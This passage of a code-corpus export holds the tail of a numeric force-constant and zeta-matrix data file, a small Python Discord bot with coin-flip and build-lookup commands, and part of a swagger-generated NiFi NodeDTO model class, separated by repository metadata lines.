[6,6,10,10,11,11 , -1.23836393616e-10],
[6,6,11 , -1.31819502416e-20],
[6,6,11,11 , -6.1746863009e-08],
[6,6,11,11,11,11 , -1.25921913668e-10],
[6,7 , 2.71050543121e-20],
[6,7,7,7,7,8 , -6.57565225169e-13],
[6,7,7,7,8 , -3.27530130679e-10],
[6,7,7,7,8,9 , -2.06953547342e-11],
[6,7,7,7,10,11 , -2.67692434193e-11],
[6,7,7,8 , 6.47043591762e-10],
[6,7,7,8,8,8 , -6.29721465511e-12],
[6,7,7,8,9 , -4.75568857736e-11],
[6,7,7,8,9,9 , -6.28030353091e-12],
[6,7,7,8,10,10 , -2.10639828802e-12],
[6,7,7,8,11,11 , -2.06196687127e-12],
[6,7,7,9,10,11 , -2.37645807813e-12],
[6,7,7,10,11 , -1.26281817818e-11],
[6,7,8 , 4.90499252701e-07],
[6,7,8,8 , 1.17065909011e-19],
[6,7,8,8,8 , 1.71098195019e-09],
[6,7,8,8,8,9 , 7.70187062792e-11],
[6,7,8,8,10,11 , 8.8243142686e-11],
[6,7,8,9 , 3.66016594659e-08],
[6,7,8,9,9 , 1.6977219233e-09],
[6,7,8,9,9,9 , 7.59589315898e-11],
[6,7,8,9,10,10 , 8.82438554075e-11],
[6,7,8,9,11,11 , 8.80152711888e-11],
[6,7,8,10,10 , 2.01214023657e-09],
[6,7,8,11,11 , 2.01553267519e-09],
[6,7,9 , -7.99678511547e-19],
[6,7,9,9 , -1.18943195411e-19],
[6,7,9,9,10,11 , 8.82577475464e-11],
[6,7,9,10,11 , 2.00885771594e-09],
[6,7,10,10 , 7.40392822684e-20],
[6,7,10,10,10,11 , 9.51641950604e-11],
[6,7,10,11 , 4.80520759589e-08],
[6,7,10,11,11,11 , 9.52697246073e-11],
[6,7,11 , -3.75076776956e-20],
[6,7,11,11 , -7.636407338e-20],
[6,8 , 3.04931861012e-20],
[6,8,8 , 2.66815378385e-19],
[6,8,8,8 , 3.83456055247e-09],
[6,8,8,8,8,8 , 2.22946562111e-11],
[6,8,8,8,9 , 3.28309677009e-10],
[6,8,8,8,9,9 , 2.34556578638e-11],
[6,8,8,8,10,10 , -4.28047774843e-12],
[6,8,8,8,11,11 , -4.49291814511e-12],
[6,8,8,9 , 1.70200682839e-20],
[6,8,8,9,10,11 , -1.08830476157e-13],
[6,8,8,10,11 , -2.19444150246e-10],
[6,8,9 , 7.26361420569e-08],
[6,8,9,9 , 6.73616624494e-09],
[6,8,9,9,9 , 4.32113030913e-10],
[6,8,9,9,9,9 , 2.90722965855e-11],
[6,8,9,9,10,10 , 1.98318396178e-12],
[6,8,9,9,11,11 , 1.20052262983e-12],
[6,8,9,10,10 , -1.64621115447e-10],
[6,8,9,11,11 , -1.74732046573e-10],
[6,8,10 , -4.69573890134e-20],
[6,8,10,10 , -1.10888921457e-08],
[6,8,10,10,10,10 , -2.8649654243e-11],
[6,8,10,10,11,11 , -2.97759711502e-11],
[6,8,10,11 , -1.24358333291e-20],
[6,8,11,11 , -1.08126128246e-08],
[6,8,11,11,11,11 , -2.94051888295e-11],
[6,9 , 4.06575814682e-20],
[6,9,9 , -2.00640929381e-19],
[6,9,9,9 , -3.12442660974e-20],
[6,9,9,9,10,11 , 4.12792842356e-12],
[6,9,9,10,11 , -1.09577158724e-10],
[6,9,10,10,10,11 , -2.61083918575e-11],
[6,9,10,11 , -9.06907220289e-09],
[6,9,10,11,11,11 , -2.65790683848e-11],
[6,9,11 , -6.23098611824e-20],
[6,9,11,11 , 3.35231486849e-20],
[6,10 , -4.06575814682e-20],
[6,10,10 , -6.96208143084e-19],
[6,10,10,10,11 , -7.64521351867e-10],
[6,10,11 , -4.78846174204e-07],
[6,10,11,11,11 , -7.60046780284e-10],
[6,11 , 3.72694496792e-20],
[6,11,11 , 8.03251931793e-19],
[7,7 , 5.80763595519e-05],
[7,7,7 , -9.17589275414e-07],
[7,7,7,7 , 1.79850893431e-08],
[7,7,7,7,7 , -4.29164568104e-10],
[7,7,7,7,7,7 , 1.11524299133e-11],
[7,7,7,7,7,9 , 4.77061533044e-12],
[7,7,7,7,8,8 , 1.6153892807e-11],
[7,7,7,7,9 , 1.93990563638e-10],
[7,7,7,7,9,9 , 1.79524921707e-11],
[7,7,7,7,10,10 , 2.05310261658e-11],
[7,7,7,7,11,11 , 2.09220710539e-11],
[7,7,7,8,8 , 6.34208649183e-11],
[7,7,7,8,8,9 , 8.88330413179e-12],
[7,7,7,8,10,11 , 4.40835668446e-12],
[7,7,7,9 , 4.63254708324e-09],
[7,7,7,9,9 , 9.98099400541e-12],
[7,7,7,9,9,9 , 1.53159992414e-11],
[7,7,7,9,10,10 , 7.44737864013e-12],
[7,7,7,9,11,11 , 4.95306312432e-12],
[7,7,7,10,10 , 7.86369009582e-11],
[7,7,7,11,11 , 5.22256633224e-11],
[7,7,8 , -9.67973370254e-19],
[7,7,8,8 , -2.91782214679e-08],
[7,7,8,8,8,8 , -5.30862353499e-11],
[7,7,8,8,9 , -1.25707777995e-09],
[7,7,8,8,9,9 , -5.53130864426e-11],
[7,7,8,8,10,10 , -6.39754049157e-11],
[7,7,8,8,11,11 , -6.57318049339e-11],
[7,7,8,9,10,11 , -6.65665933499e-11],
[7,7,8,10,11 , -1.5282729835e-09],
[7,7,9 , -6.10906694403e-07],
[7,7,9,9 , -2.72662774907e-08],
[7,7,9,9,9 , -1.129849096e-09],
[7,7,9,9,9,9 , -4.0461474387e-11],
[7,7,9,9,10,10 , -6.44929275025e-11],
[7,7,9,9,11,11 , -6.4863813877e-11],
[7,7,9,10,10 , -1.48744760497e-09],
[7,7,9,11,11 , -1.49784522017e-09],
[7,7,10 , 6.59626907674e-20],
[7,7,10,10 , -3.8812432142e-08],
[7,7,10,10,10,10 , -6.89501251771e-11],
[7,7,10,10,11,11 , -7.20283007127e-11],
[7,7,11,11 , -3.8394016752e-08],
[7,7,11,11,11,11 , -7.00108060216e-11],
[7,8 , -3.89635155737e-20],
[7,8,8 , -3.97458815296e-07],
[7,8,8,8 , -7.53751789577e-20],
[7,8,8,8,8 , -7.30941865374e-10],
[7,8,8,8,8,9 , -3.16769134571e-11],
[7,8,8,8,10,11 , -1.63080178354e-11],
[7,8,8,9 , -1.54101864999e-08],
[7,8,8,9,9 , -7.65621609648e-10],
[7,8,8,9,9,9 , -3.43119298776e-11],
[7,8,8,9,10,10 , -1.63595691508e-11],
[7,8,8,9,11,11 , -1.73168971198e-11],
[7,8,8,10,10 , -3.2325454392e-10],
[7,8,8,11,11 , -3.13562591942e-10],
[7,8,9 , -1.5950689188e-19],
[7,8,9,9 , 1.93047411358e-20],
[7,8,9,9,10,11 , -2.00170135619e-11],
[7,8,9,10,11 , -3.27894636759e-10],
[7,8,10,10 , -1.8078859468e-20],
[7,8,10,10,10,11 , 2.50630210158e-12],
[7,8,10,11 , -4.02861654794e-09],
[7,8,10,11,11,11 , 3.0419631573e-12],
[7,8,11 , 2.85344224106e-20],
[7,9,9 , -4.86459235886e-07],
[7,9,9,9 , -1.834756407e-08],
[7,9,9,9,9 , -1.03594710583e-09],
[7,9,9,9,9,9 , -1.32898768265e-11],
[7,9,9,9,10,10 , -1.90362377577e-11],
[7,9,9,9,11,11 , -2.08879416038e-11],
[7,9,9,10,10 , -4.57262305269e-10],
[7,9,9,11,11 , -4.12937632836e-10],
[7,9,10 , 5.57453558412e-20],
[7,9,10,10 , -6.54853074505e-09],
[7,9,10,10,10,10 , 2.93747064014e-12],
[7,9,10,10,11,11 , 1.20808368697e-12],
[7,9,11,11 , -5.62921501183e-09],
[7,9,11,11,11,11 , -2.75812218566e-12],
[7,10,10 , 5.33111977512e-08],
[7,10,10,10,10 , -1.1531019754e-10],
[7,10,10,11,11 , 3.2074501656e-11],
[7,10,11 , -6.02981579327e-20],
[7,11 , 3.55753837847e-20],
[7,11,11 , 2.25393217743e-08],
[7,11,11,11,11 , -3.05987740217e-11],
[8,8 , 0.000204806432028],
[8,8,8 , 3.54448348317e-17],
[8,8,8,8 , 2.36360050673e-07],
[8,8,8,8,8 , 6.72250071563e-20],
[8,8,8,8,8,8 , 3.2480538205e-10],
[8,8,8,8,9 , 8.36269851137e-09],
[8,8,8,8,9,9 , 3.22245642634e-10],
[8,8,8,8,10,10 , 3.47936290199e-10],
[8,8,8,8,11,11 , 3.44901818344e-10],
[8,8,8,9 , 7.48409857181e-19],
[8,8,8,9,9 , 1.35975568007e-20],
[8,8,8,9,10,11 , 3.31133785067e-10],
[8,8,8,10,10 , 5.83299979874e-20],
[8,8,8,10,11 , 9.06843482337e-09],
[8,8,8,11 , 3.69253425444e-20],
[8,8,8,11,11 , 3.00045937778e-20],
[8,8,9 , 7.35255543362e-06],
[8,8,9,9 , 2.34411284466e-07],
[8,8,9,9,9 , 8.42297741991e-09],
[8,8,9,9,9,9 , 3.53642737579e-10],
[8,8,9,9,10,10 , 3.50506550884e-10],
[8,8,9,9,11,11 , 3.4793756313e-10],
[8,8,9,10 , 3.8098284653e-20],
[8,8,9,10,10 , 9.15914626267e-09],
[8,8,9,10,11 , 1.46423634625e-20],
[8,8,9,11,11 , 9.17199768746e-09],
[8,8,10 , 3.02179003933e-19],
[8,8,10,10 , 2.61481128494e-07],
[8,8,10,10,10,10 , 3.77674587675e-10],
[8,8,10,10,11,11 , 3.705031794e-10],
[8,8,10,11 , 8.37129940961e-19],
[8,8,11 , -3.10225816932e-20],
[8,8,11,11 , 2.60613453852e-07],
[8,8,11,11,11,11 , 3.714296807e-10],
[8,9 , -2.37169225231e-20],
[8,9,9 , -1.20921364759e-17],
[8,9,9,9 , -7.74270831852e-19],
[8,9,9,9,9 , -3.65544425125e-20],
[8,9,9,9,10,11 , 3.40078429902e-10],
[8,9,9,10,11 , 9.12205730759e-09],
[8,9,9,11 , 5.60547213903e-20],
[8,9,9,11,11 , -2.87868288197e-20],
[8,9,10 , -3.27166475877e-20],
[8,9,10,10 , 4.02274475497e-19],
[8,9,10,10,10,11 , 3.60201929206e-10],
[8,9,10,11 , 2.61089816526e-07],
[8,9,10,11,11,11 , 3.59732373673e-10],
[8,9,11 , 8.64714760028e-19],
[8,9,11,11 , -4.13967500636e-19],
[8,10 , -6.77626357803e-20],
[8,10,10 , 2.53982829234e-17],
[8,10,10,10,10 , 4.68322650211e-20],
[8,10,10,10,11 , 9.79915458335e-09],
[8,10,10,11 , -5.53052957553e-20],
[8,10,10,11,11 , 1.58411937393e-20],
[8,10,11 , 8.00686850094e-06],
[8,10,11,11,11 , 9.79993874106e-09],
[8,11 , 4.40457132572e-20],
[8,11,11 , 2.75603345213e-19],
[8,11,11,11 , -3.61428296849e-20],
[8,11,11,11,11 , -1.45335245885e-20],
[9,9 , 0.000206888183922],
[9,9,9 , 7.27368485878e-06],
[9,9,9,9 , 2.25521065809e-07],
[9,9,9,9,9 , 1.11308231425e-08],
[9,9,9,9,9,9 , 1.28383132992e-09],
[9,9,9,9,10,10 , 3.99197412202e-10],
[9,9,9,9,11,11 , 4.01634680383e-10],
[9,9,9,10 , 5.76445625276e-20],
[9,9,9,10,10 , 9.46051180624e-09],
[9,9,9,10,11 , -4.42865262131e-20],
[9,9,9,11,11 , 9.44333322057e-09],
[9,9,10 , 9.03678275602e-19],
[9,9,10,10 , 2.6000153177e-07],
[9,9,10,10,10,10 , 3.96844716301e-10],
[9,9,10,10,11,11 , 3.7846461808e-10],
[9,9,10,11 , -8.45921216511e-19],
[9,9,11 , -2.89049993251e-20],
[9,9,11,11 , 2.59706987624e-07],
[9,9,11,11,11,11 , 3.97093175684e-10],
[9,10,10 , 8.04742754351e-06],
[9,10,10,10 , -5.41406254528e-20],
[9,10,10,10,10 , 1.01195131165e-08],
[9,10,10,11,11 , 9.91054527299e-09],
[9,10,11 , -1.30429309592e-17],
[9,10,11,11 , -3.52891792927e-20],
[9,10,11,11,11 , -3.13032673395e-20],
[9,11 , -2.37169225231e-20],
[9,11,11 , 8.00853375795e-06],
[9,11,11,11,11 , 1.01038734669e-08],
[10,10 , 0.000215636753826],
[10,10,10 , -2.60049702719e-18],
[10,10,10,10 , 2.8360086529e-07],
[10,10,10,10,10,10 , 4.12286809283e-10],
[10,10,10,10,11,11 , 3.84629047674e-10],
[10,10,10,11 , 4.36675262812e-19],
[10,10,11 , 9.58206021581e-20],
[10,10,11,11 , 2.82161462291e-07],
[10,10,11,11,11,11 , 3.81992594091e-10],
[10,11 , -1.49077798717e-19],
[10,11,11 , -2.0017506126e-18],
[10,11,11,11 , -4.45847041444e-19],
[11,11 , 0.000219105358527],
[11,11,11 , 9.7091151579e-20],
[11,11,11,11 , 2.81381258282e-07],
[11,11,11,11,11,11 , 4.05414301196e-10]]
B = [2.2398698590300887e-05, 4.5961908954989412e-06, 3.8136364509260239e-06]
zeta = [
[
[0.0 , 1.59081081641e-13 , 0.498787464915 , -1.93456362041e-14 , -1.82577605968e-15 , -8.85908985743e-17
, -3.50958690629e-16 , 7.31618540129e-18 , -6.78015133219e-16 , 3.81783151778e-17 , -2.55248019811e-15 , -8.56946555992e-16],
[-1.59081081641e-13 , 0.0 , 1.97263384082e-15 , -1.82186289386e-15 , 0.54816240103 , -1.88737914186e-15
, -4.16333634234e-15 , -5.53723733532e-15 , -4.8017145815e-15 , 8.76521077942e-14 , 0.836371916134 , -8.89593954057e-13],
[-0.498787464915 , -1.97263384082e-15 , 0.0 , -3.96651401657e-16 , -1.59407209654e-13 , 2.28983498829e-15
, 1.05193631583e-14 , -5.92581539394e-15 , -3.16413562018e-14 , 2.6645352591e-15 , -9.12409037213e-13 , -0.866724330364],
[1.93456362041e-14 , 1.82186289386e-15 , 3.96651401657e-16 , 0.0 , -7.54257767355e-15 , -1.85962356625e-15
, 0.533232207071 , 1.02695629778e-14 , 0.845968919844 , -1.36735067713e-12 , 1.25177646026e-14 , -3.54716256368e-14],
[1.82577605968e-15 , -0.54816240103 , 1.59407209654e-13 , 7.54257767355e-15 , 0.0 , 2.26330053846e-16
, 1.99308683064e-15 , 5.05361422418e-18 , 3.66955573646e-15 , -9.56900723456e-18 , 1.14085884765e-15 , 2.99114471692e-16],
[8.85908985743e-17 , 1.88737914186e-15 , -2.28983498829e-15 , 1.85962356625e-15 , -2.26330053846e-16 , 0.0
, 1.55401751862e-16 , 6.28931682639e-30 , 2.46543720394e-16 , -4.35207782137e-28 , -3.45328502024e-16 , 1.53941092438e-16],
[3.50958690629e-16 , 4.16333634234e-15 , -1.05193631583e-14 , -0.533232207071 , -1.99308683064e-15 , -1.55401751862e-16
, 0.0 , -5.08755735264e-18 , -2.06983095169e-16 , -1.48001668437e-17 , 3.04144642149e-16 , -2.89060648443e-16],
[-7.31618540129e-18 , 5.53723733532e-15 , 5.92581539394e-15 , -1.02695629778e-14 , -5.05361422418e-18 , -6.29817610414e-30
, 5.08755735264e-18 , 0.0 , 8.0713717986e-18 , -1.35489171588e-29 , -7.71067297595e-18 , -1.27130618526e-17],
[6.78015133219e-16 , 4.8017145815e-15 , 3.16413562018e-14 , -0.845968919844 , -3.66955573646e-15 , -2.46543720394e-16
, 2.06983095169e-16 , -8.0713717986e-18 , 0.0 , -2.34803543232e-17 , -2.91865580446e-16 , -2.47949994183e-16],
[-3.81783151778e-17 , -8.76521077942e-14 , -2.6645352591e-15 , 1.36735067713e-12 , 9.56900723456e-18 , 4.35219337717e-28
, 1.48001668437e-17 , 1.35504579027e-29 , 2.34803543232e-17 , 0.0 , 1.4600142032e-17 , -6.63410309672e-17],
[2.55248019811e-15 , -0.836371916134 , 9.12409037213e-13 , -1.25177646026e-14 , -1.14085884765e-15 , 3.45328502024e-16
, -3.04144642149e-16 , 7.71067297595e-18 , 2.91865580446e-16 , -1.4600142032e-17 , 0.0 , 5.10862685654e-17],
[8.56946555992e-16 , 8.89593954057e-13 , 0.866724330364 , 3.54716256368e-14 , -2.99114471692e-16 , -1.53941092438e-16
, 2.89060648443e-16 , 1.27130618526e-17 , 2.47949994183e-16 , 6.63410309672e-17 , -5.10862685654e-17 , 0.0]],
[
[0.0 , -4.77395900589e-15 , 3.06976666309e-14 , 0.866724330364 , 3.75280349953e-15 , 1.30898185924e-15
, 6.20188537507e-16 , -2.30530274217e-15 , -5.07777703551e-16 , -1.63866194265e-15 , 2.88677192272e-16 , -2.91751599619e-16],
[4.77395900589e-15 , 0.0 , 5.860406578e-16 , 2.87662478926e-15 , -2.08166817117e-15 , -0.347654390213
, 2.27790009077e-13 , 0.761389290553 , 7.30915328262e-13 , 0.547195370226 , -5.18196596744e-14 , -7.11930514541e-15],
[-3.06976666309e-14 , -5.860406578e-16 , 0.0 , -7.10777564301e-16 , -7.52176099184e-15 , 1.06886721696e-13
, 0.845968919844 , -2.05085948224e-13 , -0.533232207071 , 7.134570712e-13 , 5.6760152134e-15 , 4.73787675759e-14],
[-0.866724330364 , -2.87662478926e-15 , 7.10777564301e-16 , 0.0 , -2.19269047363e-14 , -1.14352971536e-14
, -2.40085729075e-14 , 8.16013923099e-15 , 5.59829960167e-14 , -3.85802501057e-15 , 3.80001585754e-13 , 0.498787464915],
[-3.75280349953e-15 , 2.08166817117e-15 , 7.52176099184e-15 , 2.19269047363e-14 , 0.0 , -4.66192664897e-16
, -2.71570388323e-16 , 1.02099703723e-15 , 1.7117659307e-16 , 7.33770304781e-16 , 1.5811730769e-27 , 2.15968477898e-15],
[-1.30898185924e-15 , 0.347654390213 , -1.06886721696e-13 , 1.14352971536e-14 , 4.66192664897e-16 , 0.0
, 4.99927692364e-17 , -3.17574116672e-16 , 9.05099006974e-17 , -2.19861942388e-16 , -1.22484405323e-17 , 1.32120140401e-16],
[-6.20188537507e-16 , -2.27790009077e-13 , -0.845968919844 , 2.40085729075e-14 , 2.71570388323e-16 , -4.99927692364e-17
, 0.0 , 4.26148350142e-16 , -2.27709060069e-16 , 2.50429826289e-16 , 1.87658007983e-17 , -9.72452971984e-17],
[2.30530274217e-15 , -0.761389290553 , 2.05085948224e-13 , -8.16013923099e-15 , -1.02099703723e-15 , 3.17574116672e-16
, -4.26148350142e-16 , 0.0 , 1.37430284869e-18 , -1.83359054044e-17 , 2.68250069895e-17 , 3.3762653335e-17],
[5.07777703551e-16 , -7.30915328262e-13 , 0.533232207071 , -5.59829960167e-14 , -1.7117659307e-16 , -9.05099006974e-17
, 2.27709060069e-16 , -1.37430284869e-18 , 0.0 , 3.42060105952e-17 , -1.18284834613e-17 , -5.95529301277e-18],
[1.63866194265e-15 , -0.547195370226 , -7.134570712e-13 , 3.85802501057e-15 , -7.33770304781e-16 , 2.19861942388e-16
, -2.50429826289e-16 , 1.83359054044e-17 , -3.42060105952e-17 , 0.0 , 1.92786000711e-17 , 3.46885400828e-17],
[-2.88677192272e-16 , 5.18196596744e-14 , -5.6760152134e-15 , -3.80001585754e-13 , -1.58121005476e-27 , 1.22484405323e-17
, -1.87658007983e-17 , -2.68250069895e-17 , 1.18284834613e-17 , -1.92786000711e-17 , 0.0 , 1.66129598383e-16],
[2.91751599619e-16 , 7.11930514541e-15 , -4.73787675759e-14 , -0.498787464915 , -2.15968477898e-15 , -1.32120140401e-16
, 9.72452971984e-17 , -3.3762653335e-17 , 5.95529301277e-18 , -3.46885400828e-17 , -1.66129598383e-16 , 0.0]],
[
[0.0 , -4.83061399328e-18 , 4.69873815694e-17 , 1.15606122492e-17 , 1.04083408559e-15 , -8.32667268469e-15
, 0.0402066346758 , -7.25808302349e-15 , 0.999191386336 , -1.63764835026e-12 , -4.92661467177e-16 , -7.12277459236e-14],
[4.83061399328e-18 , 0.0 , 8.03371240938e-32 , 6.36147594518e-31 , -1.32446610972e-16 , -4.44397625952e-16
, -1.0063394774e-16 , -2.71326181884e-16 , 3.35765938913e-15 , -1.07928830809e-15 , 1.40350076641e-16 , -6.90346305966e-16],
[-4.69873815694e-17 , -8.03371240938e-32 , 0.0 , 3.20820659e-31 , -9.8518934423e-17 , 9.84091407643e-17
, -1.08632350693e-17 , 3.07808614455e-17 , -1.0297132247e-15 , 1.97122781969e-16 , 7.63944922794e-17 , -2.51883934728e-16],
[-1.15606122492e-17 , -6.36147594518e-31 , -3.20820659e-31 , 0.0 , 9.49377192028e-17 , -1.50026390563e-15
, 6.73720352646e-18 , -9.16479521631e-16 , 9.13790094471e-16 , -3.64433169101e-15 , -1.69603797147e-16 , 1.98317653511e-16],
[-1.02695629778e-15 , 1.32446610972e-16 , 9.8518934423e-17 , -9.49377192028e-17 , 0.0 , 0.361678563087
, -2.08860706508e-15 , 0.237096099428 , 1.482629991e-12 , 0.901650739832 , -8.95949980873e-14 , -5.55111512313e-15],
[8.32667268469e-15 , 4.44397625952e-16 , -9.84091407643e-17 , 1.50026390563e-15 , -0.361678563087 , 0.0
, -3.34454686168e-15 , -2.82066037194e-15 , 2.86576318231e-15 , 6.05626659933e-14 , 0.652715579308 , -5.02368979749e-13],
[-0.0402066346758 , 1.0063394774e-16 , 1.08632350693e-17 , -6.73720352646e-18 , 2.09554595898e-15 , 3.34454686168e-15
, 0.0 , 2.87964097012e-15 , 7.14567294224e-14 , 4.0800696155e-15 , 7.81055775612e-13 , 0.999191386336],
[7.25808302349e-15 , 2.71326181884e-16 , -3.07808614455e-17 , 9.16479521631e-16 , -0.237096099428 , 2.81719092499e-15
, -2.85882428841e-15 , 0.0 , 1.51267887105e-15 , -8.06785194207e-14 , -0.754953760684 , 5.97973059957e-13],
[-0.999191386336 , -3.35765938913e-15 , 1.0297132247e-15 , -9.13790094471e-16 , -1.48261958266e-12 , -2.74780198595e-15
, -7.14428516346e-14 , -1.51267887105e-15 , 0.0 , -2.35922392733e-16 , -1.34878219704e-13 , -0.0402066346758],
[1.6376067169e-12 , 1.07928830809e-15 , -1.97122781969e-16 , 3.64433169101e-15 , -0.901650739832 , -6.05904215689e-14
, -4.0800696155e-15 , 8.06854583146e-14 , 2.35922392733e-16 , 0.0 , -0.0633023835066 , 1.13034581695e-13],
[4.99600361081e-16 , -1.40350076641e-16 , -7.63944922794e-17 , 1.69603797147e-16 , 8.96227536629e-14 , -0.652715579308
, -7.81041897824e-13 , 0.754953760684 , 1.34878219704e-13 , 0.0633023835066 , 0.0 , -6.24500451352e-16],
[7.12208070297e-14 , 6.90346305966e-16 , 2.51883934728e-16 , -1.98317653511e-16 , 5.55111512313e-15 , 5.02375918643e-13
, -0.999191386336 , -5.97966121063e-13 , 0.0402066346758 , -1.13034581695e-13 , 6.24500451352e-16 , 0.0]]]
| 48.697959
| 130
| 0.465112
|
c029026da079103275fcf3846e9a3cb0b9572a9c
| 1,702
|
py
|
Python
|
Main.py
|
phaalonso/BotDiscord
|
228d14af94cf58dbea93428ac5fdd21d324dfcda
|
[
"Apache-2.0"
] | 1
|
2018-03-14T17:45:32.000Z
|
2018-03-14T17:45:32.000Z
|
Main.py
|
phaalonso/BotDiscord
|
228d14af94cf58dbea93428ac5fdd21d324dfcda
|
[
"Apache-2.0"
] | null | null | null |
Main.py
|
phaalonso/BotDiscord
|
228d14af94cf58dbea93428ac5fdd21d324dfcda
|
[
"Apache-2.0"
] | null | null | null |
import discord
import random
import Secreto
import builds
TOKEN = Secreto.seu_token() # token linkage (read from the Secreto module)
client = discord.Client()
RhinoT = builds.Rhino(True)
RhinoF = builds.Rhino(False)
@client.event
async def on_ready():
print('Bot ONLINE - Olá Mundo!')
print(client.user.name)
print(client.user.id)
print('-----------------------')
await client.change_presence(game=discord.Game(name='Online'))
@client.event
async def on_message(message): # Reply to the user
if message.author == client.user:
return
    if message.content.startswith("!"):
        if message.content.lower().startswith("!test"):
            await client.send_message(message.channel, "Ola Mundo, estou vivo!")
        elif message.content.lower().startswith("!moeda"): # Heads or tails, 50/50 chance
            choice = random.randint(1, 2)
            if choice == 1:
                await client.add_reaction(message, '😀')
            elif choice == 2:
                await client.add_reaction(message, '👑')
        elif message.content == "!cookie": # Reply to the user with an emoticon
await client.send_message(message.channel, ":cookie:")
elif str(message.content).startswith('!build'):
            segunda = str(message.content).split()[1]
'''if segunda == 'Teste':
await client.send_message(message.channel,'OI')
print('daijwi')'''
            # Local list renamed from "builds" so it does not shadow the imported builds module
            build_list = [('Rhino', 'link1','descri1'), ('Loki', 'link2','descri2'), ('Banshee', 'link3','descri3'), ('Vauban', 'link4','descri4')]
            for i in build_list:
                if i[0] == segunda:
await client.send_message(message.channel, i[1])
await client.send_message(message.channel, i[2])
client.run(TOKEN)
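The branch-per-command dispatch above repeats the raw-message checks in every branch; the sketch below shows the same idea with the prefix stripped once. It is a hypothetical helper (the name parse_command and its signature are assumptions, not part of the original bot) and it runs outside the discord.py event loop:
# Hypothetical helper, not part of the original bot: strip the command prefix once
# and return (command, args) so each branch can match on the bare command name.
def parse_command(content, prefix="!"):
    if not content.startswith(prefix):
        return None, []
    parts = content[len(prefix):].split()
    if not parts:
        return None, []
    return parts[0].lower(), parts[1:]

# Example: parse_command("!build Rhino") returns ("build", ["Rhino"]).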
| 31.518519
| 139
| 0.625734
|
d617b1176bc67df38938dcb3ae4413ac2f1ad8de
| 10,834
|
py
|
Python
|
nipyapi/nifi/models/node_dto.py
|
esecules/nipyapi
|
e8a53b79a5e1a6b29446f43d2b23b6a3e60873f1
|
[
"Apache-2.0"
] | null | null | null |
nipyapi/nifi/models/node_dto.py
|
esecules/nipyapi
|
e8a53b79a5e1a6b29446f43d2b23b6a3e60873f1
|
[
"Apache-2.0"
] | null | null | null |
nipyapi/nifi/models/node_dto.py
|
esecules/nipyapi
|
e8a53b79a5e1a6b29446f43d2b23b6a3e60873f1
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
NiFi Rest Api
The Rest Api provides programmatic access to command and control a NiFi instance in real time. Start and stop processors, monitor queues, query provenance data, and more. Each endpoint below includes a description, definitions of the expected input and output, potential response codes, and the authorizations required to invoke each service.
OpenAPI spec version: 1.11.1-SNAPSHOT
Contact: dev@nifi.apache.org
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class NodeDTO(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'node_id': 'str',
'address': 'str',
'api_port': 'int',
'status': 'str',
'heartbeat': 'str',
'connection_requested': 'str',
'roles': 'list[str]',
'active_thread_count': 'int',
'queued': 'str',
'events': 'list[NodeEventDTO]',
'node_start_time': 'str'
}
attribute_map = {
'node_id': 'nodeId',
'address': 'address',
'api_port': 'apiPort',
'status': 'status',
'heartbeat': 'heartbeat',
'connection_requested': 'connectionRequested',
'roles': 'roles',
'active_thread_count': 'activeThreadCount',
'queued': 'queued',
'events': 'events',
'node_start_time': 'nodeStartTime'
}
def __init__(self, node_id=None, address=None, api_port=None, status=None, heartbeat=None, connection_requested=None, roles=None, active_thread_count=None, queued=None, events=None, node_start_time=None):
"""
NodeDTO - a model defined in Swagger
"""
self._node_id = None
self._address = None
self._api_port = None
self._status = None
self._heartbeat = None
self._connection_requested = None
self._roles = None
self._active_thread_count = None
self._queued = None
self._events = None
self._node_start_time = None
if node_id is not None:
self.node_id = node_id
if address is not None:
self.address = address
if api_port is not None:
self.api_port = api_port
if status is not None:
self.status = status
if heartbeat is not None:
self.heartbeat = heartbeat
if connection_requested is not None:
self.connection_requested = connection_requested
if roles is not None:
self.roles = roles
if active_thread_count is not None:
self.active_thread_count = active_thread_count
if queued is not None:
self.queued = queued
if events is not None:
self.events = events
if node_start_time is not None:
self.node_start_time = node_start_time
@property
def node_id(self):
"""
Gets the node_id of this NodeDTO.
The id of the node.
:return: The node_id of this NodeDTO.
:rtype: str
"""
return self._node_id
@node_id.setter
def node_id(self, node_id):
"""
Sets the node_id of this NodeDTO.
The id of the node.
:param node_id: The node_id of this NodeDTO.
:type: str
"""
self._node_id = node_id
@property
def address(self):
"""
Gets the address of this NodeDTO.
The node's host/ip address.
:return: The address of this NodeDTO.
:rtype: str
"""
return self._address
@address.setter
def address(self, address):
"""
Sets the address of this NodeDTO.
The node's host/ip address.
:param address: The address of this NodeDTO.
:type: str
"""
self._address = address
@property
def api_port(self):
"""
Gets the api_port of this NodeDTO.
The port the node is listening for API requests.
:return: The api_port of this NodeDTO.
:rtype: int
"""
return self._api_port
@api_port.setter
def api_port(self, api_port):
"""
Sets the api_port of this NodeDTO.
The port the node is listening for API requests.
:param api_port: The api_port of this NodeDTO.
:type: int
"""
self._api_port = api_port
@property
def status(self):
"""
Gets the status of this NodeDTO.
The node's status.
:return: The status of this NodeDTO.
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""
Sets the status of this NodeDTO.
The node's status.
:param status: The status of this NodeDTO.
:type: str
"""
self._status = status
@property
def heartbeat(self):
"""
Gets the heartbeat of this NodeDTO.
        The time of the node's last heartbeat.
:return: The heartbeat of this NodeDTO.
:rtype: str
"""
return self._heartbeat
@heartbeat.setter
def heartbeat(self, heartbeat):
"""
Sets the heartbeat of this NodeDTO.
        The time of the node's last heartbeat.
:param heartbeat: The heartbeat of this NodeDTO.
:type: str
"""
self._heartbeat = heartbeat
@property
def connection_requested(self):
"""
Gets the connection_requested of this NodeDTO.
The time of the node's last connection request.
:return: The connection_requested of this NodeDTO.
:rtype: str
"""
return self._connection_requested
@connection_requested.setter
def connection_requested(self, connection_requested):
"""
Sets the connection_requested of this NodeDTO.
The time of the node's last connection request.
:param connection_requested: The connection_requested of this NodeDTO.
:type: str
"""
self._connection_requested = connection_requested
@property
def roles(self):
"""
Gets the roles of this NodeDTO.
The roles of this node.
:return: The roles of this NodeDTO.
:rtype: list[str]
"""
return self._roles
@roles.setter
def roles(self, roles):
"""
Sets the roles of this NodeDTO.
The roles of this node.
:param roles: The roles of this NodeDTO.
:type: list[str]
"""
self._roles = roles
@property
